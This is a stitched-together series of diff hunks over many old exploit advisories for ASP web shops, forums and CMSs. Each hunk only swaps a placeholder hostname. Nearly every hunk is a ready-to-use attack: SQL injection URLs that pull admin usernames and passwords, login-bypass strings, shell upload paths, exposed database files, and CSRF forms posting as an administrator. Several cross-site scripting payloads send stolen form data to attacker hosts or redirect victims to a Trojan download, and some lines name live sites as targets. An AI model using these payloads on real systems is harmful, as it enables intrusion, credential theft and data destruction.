################################################################################
##########################################################################################################################################################
#Username : http://server/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
##########################################################################################################################################################
#Password : http://server/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
################################################################
#Admin Panel : http://server/path/theadmin/default.asp #
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################
# milw0rm.com [2006-09-05]


@ -17,10 +17,10 @@ SelectSurvey CMS (ASP.NET) Shell Upload Vulnerability
exploit # /survey/UploadImagePopup.aspx
or http://survey.server/UploadImagePopup.aspx
or http://survey.site.com/UploadImagePopup.aspx
Upload to # http://server/UploadedImages/shell.asp
Upload to # http://site.com/UploadedImages/shell.asp
#######################################################


@ -6,7 +6,7 @@
# Vulnerable file : icerik.asp
exp :
http://server/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID )


@ -8,7 +8,7 @@
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="http://www.someserver/forum/doprofiledit.asp"><p><b>
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>


@ -6,4 +6,4 @@ Successful exploitation of this vulnerability could lead to a compromise of the
calculator.asp?cpaint_function=addNumbers&cpaint_argument[]=1&cpaint_argument[]=2")%20%26%20eval("malicious code
http://someserver/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code
http://someserver.com/cpaintfile.asp?cpaint_function=response.write&cpaint_argument[]=2")%20%26%20eval("malicious code


@ -69,8 +69,8 @@ An attacker can exploit these vulnerabilities to retrieve sensitive and privileg
# Connection closed by foreign host.
#
# exemple:
# www.server/comersus/database/comersus.mdb
# www.server/database/comersus.mdb
# www.site.com/comersus/database/comersus.mdb
# www.site.com/database/comersus.mdb
#
# Decryption vulnerability (all versions)
# the problem is that comersus encryption tool use
@ -122,11 +122,11 @@ An attacker can exploit these vulnerabilities to retrieve sensitive and privileg
# this issues are due to a failure in the application to properly sanitize user-supplied input. an attacker may exploit this vulnerability
# to have arbitrary script code executed in the browser
# blackofficeelite:
# server/comersus/backofficelite/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
# www.target.com/comersus/backofficelite/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
# or blackofficeplus
# server/comersus/backofficeplus/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
# www.target.com/comersus/backofficeplus/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
#
# server/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>
# www.target.com/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>
#
# i wrote the following code for testing and educational
# purposes, use it at your own risk and on your own machine


@ -24,10 +24,10 @@ Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum director
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testserver&VDirName=test&ForumID=1
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testserver&VDirName=test&ForumID=
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1


@ -10,7 +10,7 @@ passwd: 'or''='
injection sql (post) :
http://server/search_list.asp
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )


@ -4,4 +4,4 @@ Cisco CallManager is prone to a cross-site scripting vulnerability. This issue i
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting administrative user in the context of the affected site. This may help the attacker launch other attacks.
http://www.example.com/CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter="><script>for (i=0; i<document.forms.length; i%2B%2B) document.forms[i].action="http://www.attackerserver/stealstuff.cgi";</script><!--
http://www.example.com/CallManagerAddress/ccmuser/logon.asp?userID=&password=&MadeUpParameter="><script>for (i=0; i<document.forms.length; i%2B%2B) document.forms[i].action="http://www.attackersite.com/stealstuff.cgi";</script><!--


@ -4,6 +4,6 @@ Inventory Manager is prone to multiple input-validation vulnerabilities, includi
Successful exploits of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
http://server/inventory/inventory/display/imager.asp?pictable='[sql]
http://server/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
http://server/inventory/inventory/display/imager.asp?pictable=[inventory &picfield=photo&where='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory &picfield=photo&where='[sql]


@ -14,8 +14,8 @@ Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"
------------------------------------------------------------
Example : http://www.usfim.it/RASPcalendar/
: http://server/events
: http://server/calendar
: http://site.com/events
: http://site.com/calendar
: etc...
Go to : http://www.usfim.it/RASPcalendar/admin/


@ -8,4 +8,4 @@ The attacker may also leverage this issue to execute arbitrary code in the brows
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_server/Trojan.exe"</script>
http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>


@ -8,4 +8,4 @@ The attacker may also leverage this issue to execute arbitrary code in the brows
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.server/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_server/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>
http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>


@ -11,7 +11,7 @@ This vulnerability is an unprotected page on the site where you can view
all current users and usernames.
To find out if a Kentico CMS is vulnerable go to
http://server/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx
http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx
assuming that the Kentico CMS was installed to the root folder in the
server.


@ -6,7 +6,7 @@
###############################################################
#Download Link Of Fullaspsite Asp Hosting Sitesi (tr) :
http://www.aspindir.com/Goster/4383
#Demo : http://aspsiteler.fullaspserver/hosting
#Demo : http://aspsiteler.fullaspsite.com/hosting
#Exploit;
#Admin Nick, Passport;


@ -11,3 +11,4 @@


@ -11,7 +11,7 @@ Bulan: xoron
Download: http://www.aspindir.com/Goster/3439
-----------------------------------------------------------------------
Exploit: http://server/ page.asp?art_id=[SQL]
Exploit: http://www.target.com/ page.asp?art_id=[SQL]
Username: page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1


@ -8,7 +8,7 @@
#####################################
-------
Exploit :
http://www.server/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Admin Panel : admin_default.asp
# milw0rm.com [2007-03-12]


@ -29,7 +29,7 @@ if len(sys.argv) < 2:
print "| |"
print "| Onlineon E-Ticaret Database Disclosure Exploit (.py) |"
print "| ZoRLu / milw00rm.com |"
print "| exploit.py http://server/path/ |"
print "| exploit.py http://site.com/path/ |"
print "|____________________________________________________________________|"
sys.exit(1)


@ -12,6 +12,6 @@ Contact : kerem125@kerem125.com & by_gsy@hotmail.com
############################################################################################################
RunawaySoft Haber portal v1.0 (tr) Database Disclosure
Example: [server]/[path]/haber/data/xice.mdb
Example: [site.com]/[path]/haber/data/xice.mdb
# milw0rm.com [2007-05-16]


@ -10,7 +10,7 @@ Bug : in urunbak.asp
Down : http://www.aspdestek.net/uploads/20070518_092540_webmarket.rar
Site :
Exploit : http://server/script_path/urunbak.asp?id=25+union+select+0,1,parola,3,4,5,6+from+ayar
Exploit : http://site.com/script_path/urunbak.asp?id=25+union+select+0,1,parola,3,4,5,6+from+ayar
Note : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda]


@ -8,7 +8,7 @@ email:timq@hushmail.com
Vendor:http://www.rammdev.com/ashop/
PoC:
http://server/admin/filebrowser.asp?folder=products&delfiles=[del any file on server]
http://site.com/admin/filebrowser.asp?folder=products&delfiles=[del any file on server]
It is possible to delete not only the files in the folders listed,
but also ouside its directory.


@ -10,6 +10,6 @@
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password : http://www.server/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
* Exploit : Admin User / Password : http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
# milw0rm.com [2007-11-05]


@ -21,7 +21,7 @@ PortalApp is a Content Management System (CMS) for websites.
Bug: The user input 'sortby' is directly used in query statement!
#Exploit:
http://server/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users
author will be usernames
topic will be passwords
@ -34,7 +34,7 @@ views will be access levels (5 is super admin)
##############################################################################
create a forum:
<html>
<form action=http://server/forums.asp?action=insert_level1_edit_disc_forums method=post>
<form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
@ -46,7 +46,7 @@ create a forum:
create a topic:
<html>
<form action=http://server/forums.asp?action=insert_level2_edit_disc_topics method=post>
<form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumID:<input type=text name=ForumId value=><br>
Subject:<input type=text name=Subject value="r3dm0v3."><br>
@ -62,10 +62,10 @@ create a topic:
</form>
</html>
delete a forum: http://server/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://server/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://server/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://server/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]
delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]
#There some other actions:
insert_level3_edit_disc_replies
@ -82,7 +82,7 @@ update_level2_disc_replies
##############################################################################
Add content:
<html>
<form action=http://server/content.asp?action=insert_detail_default method=post>
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
catID:<input type=text name=CatID value=198><br>
@ -110,7 +110,7 @@ Add content:
##############################################################################
# XSS #
##############################################################################
http://server/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://server/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
# milw0rm.com [2008-01-06]


@ -15,9 +15,9 @@ Dork : "Powered by i-pos Storefront"
Attackz;
Http://Localserver/path/index.asp?item=[SQL Injection]
Http://Localsite.com/path/index.asp?item=[SQL Injection]
Example Attack: http://localserver/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
Example Attack: http://localsite.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
Example Site: www.keysquality.com/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
######################################################################################################


@ -10,7 +10,7 @@
#
# Google D0rk : allinurl:index.asp?sideid=
POC : www.server/index.asp?sideid=[SQL]
POC : www.site.com/index.asp?sideid=[SQL]
SQL : 1+union+select+concat(username,0x3a,password),2,3+from+login/*


@ -18,11 +18,11 @@
#
#--# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
#
http://www.server/path/album.asp?action=uploadmedia&cat=Real Category Name! #
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
#
and your shell adress: #
#
http://www.server/path/album/categories/Real Category Name!/pics/yourshell.asp #
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
@ -36,7 +36,7 @@ Ablaze rally 9-24-06/pics/klasvayv.asp
#--# 2-Admin Bypass [AspWebAlbum 3.2] #
#
#
http://server/path/album.asp?action=login #
http://site.com/path/album.asp?action=login #
#
ASP/MS SQL Server login syntax #
#
@ -46,7 +46,7 @@ Password:anything
#
#--# 3-Xss Vulnerability [AspWebAlbum 3.2] #
#
http://server/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
#
##################################################################################################


@ -13,7 +13,7 @@ Exploit : For username
you can read username on title
www.server/script_path/izle.asp?oyun=56+union+select+0,1,KULLANICIADI,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
www.site.com/script_path/izle.asp?oyun=56+union+select+0,1,KULLANICIADI,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
**************************************************************************************
@ -21,13 +21,13 @@ Exploit : For Password(md5 hash)
you can read password on title
www.server/script_path/izle.asp?oyun=56+union+select+0,1,PAROLA,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
www.site.com/script_path/izle.asp?oyun=56+union+select+0,1,PAROLA,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
**************************************************************************************
Administrator Path
www.server/script_path/yonetim_default.asp
www.site.com/script_path/yonetim_default.asp
**************************************************************************************


@ -8,7 +8,7 @@
#################################################################################################
### POC
www.server/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
### Exploit :


@ -35,7 +35,7 @@
#Exploit :
http://server/db/MailingList.mdb
http://target.com/db/MailingList.mdb
#live example :


@ -11,7 +11,7 @@
# easy to update. Free license under the GPL.
#
# Exploit:
# server/Database/News.mdb
# SITE.COM/Database/News.mdb
# D0rk : "powered by easy-news.org"
#
# -------------------------------


@ -18,7 +18,7 @@
#Exploit :
http://server/rankup.asp?siteID=convert(int,(select+@@version));--
http://target.com/rankup.asp?siteID=convert(int,(select+@@version));--
#Live Demo
http://www.top50.co.nz/rankup.asp?siteID=convert(int,(select+top+1+siteUserName+from+TBLsites));--


@ -19,7 +19,7 @@
#Exploit :
http://server/login.asp
http://target.com/login.asp
username : ' or '1'='1
password : ' or '1'='1


@ -6,7 +6,7 @@ script: Cold BBS
download from:http://www.peachydandy.com/scripts/download.php?go=2&file=4&mirror=7
***************************************************************************
www.server/path/db/cforum.mdb
www.site.com/path/db/cforum.mdb
***************************************************
